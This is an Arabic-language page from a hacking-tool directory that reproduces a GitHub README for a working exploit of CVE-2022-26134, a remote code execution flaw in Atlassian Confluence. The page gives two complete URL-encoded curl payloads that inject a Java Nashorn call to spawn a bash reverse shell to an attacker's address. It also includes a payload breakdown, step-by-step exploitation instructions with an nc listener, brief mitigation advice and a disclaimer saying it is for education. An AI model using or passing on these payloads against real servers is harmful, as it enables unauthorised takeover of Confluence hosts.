Skip to content
KitploitKITPLOIT
أدواتعمليات الاستغلالالمدونة
Log in
إرسال
أدواتعمليات الاستغلالالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2022-26134 — استغلال نشط لـ Atlassian’s Questions for Confluence App CVE-2022-26134 | Kitploit
أدوات/GitHubGitHub/khalidhaimur/cve-2022-26134
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالتعلم والتعليمأداة الوصول عن بعد
GitHubkhalidhaimur/cve-2022-26134

CVE-2022-26134

استغلال نشط لـ Atlassian’s Questions for Confluence App CVE-2022-26134

عرض المستودع
منذ سنة واحدةلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

الاستغلال النشط لثغرة Confluence CVE-2022-26134

نظرة عامة

CVE-2022-26134 هي ثغرة تنفيذ تعليمات برمجية عن بُعد (RCE) خطيرة تؤثر في Atlassian Confluence. تسمح هذه الثغرة للمهاجمين غير المصادق عليهم بتنفيذ تعليمات برمجية عشوائية عن طريق حقن تعبيرات OGNL في نقاط النهاية الضعيفة.

الإصدارات المتأثرة

  • جميع الإصدارات المدعومة من Atlassian Confluence Server و Data Center قبل الإصدار المُصحّح.

تفاصيل الاستغلال

يُظهر أمر CURL التالي الاستغلال النشط لهذه الثغرة، باستخدام محرك Nashorn لجافا لتنفيذ شل عكسي:

curl -v http://10.0.0.28:8090/%24%7Bnew%20javax.script.ScriptEngineManager%28%29.getEngineByName%28%22nashorn%22%29.eval%28%22new%20java.lang.ProcessBuilder%28%29.command%28%27bash%27%2C%27-c%27%2C%27bash%20-i%20%3E%26%20/dev/tcp/10.0.0.28/1270%200%3E%261%27%29.start%28%29%22%29%7D/

أثناء إجراء هذه التعديلات، نحتاج أيضًا إلى مراعاة ترميز URL. سلسلة الحمولة في إثبات المفهوم ليست مشفرة بالكامل بترميز URL. بعض الأحرف (خاصة ".", "-" و "/") غير مشفرة. على الرغم من أن الأمر ليس كذلك دائمًا، إلا أن هذا يثبت أنه مهم لتشغيل الحمولة في هذا الاستغلال. إذا تم ترميز أي من هذه الأحرف، فسيقوم الخادم بتحليل URL بشكل مختلف، وقد لا يتم تنفيذ الحمولة. هذا يعني أنه لا يمكننا تطبيق ترميز URL على الحمولة بأكملها بمجرد تعديلها.

curl http://192.168.50.63:8090/%24%7Bnew%20javax.script.ScriptEngineManager%28%29.getEngineByName%28%22nashorn%22%29.eval%28%22new%20java.lang.ProcessBuilder%28%29.command%28%27bash%27%2C%27-c%27%2C%27bash%20-i%20%3E%26%20/dev/tcp/192.168.118.4/4444%200%3E%261%27%29.start%28%29%22%29%7D/

تحليل الحمولة

  1. ${new javax.script.ScriptEngineManager().getEngineByName("nashorn").eval(...)}
    • يستخدم محرك Java Nashorn النصي لتقييم تعبير OGNL.
  2. new java.lang.ProcessBuilder().command('bash','-c','bash -i > /dev/tcp/10.0.0.28/1270 0>&1').start()
    • ينشئ شل عكسي يتصل مرة أخرى بـ 10.0.0.28:1270.

خطوات الاستغلال

  1. قم بإعداد مستمع على جهازك المهاجم:
    nc -lvnp 1270
    
  2. نفذ أمر الاستغلال CURL.
  3. عند نجاح الاستغلال، ستتلقى شل عكسي.

التخفيف

  • أصدرت Atlassian تصحيحات أمنية للإصدارات المتأثرة. يُوصى بشدة بتحديث الإصدار إلى الأحدث فورًا.
  • قم بتقييد الوصول إلى خوادم Confluence من المصادر غير الموثوقة.
  • راقب السجلات للبحث عن الطلبات المشبوهة التي تحتوي على تعبيرات OGNL.

المراجع

  • تنبيه أمني من Atlassian
  • تفاصيل CVE-2022-26134

إخلاء مسؤولية

هذه الوثائق هي لأغراض تعليمية فقط. الاستغلال غير المصرح به للأنظمة غير قانوني وقد يؤدي إلى عواقب وخيمة. احصل دائمًا على التصريح المناسب قبل إجراء تقييمات الأمان.

تنزيل الأداة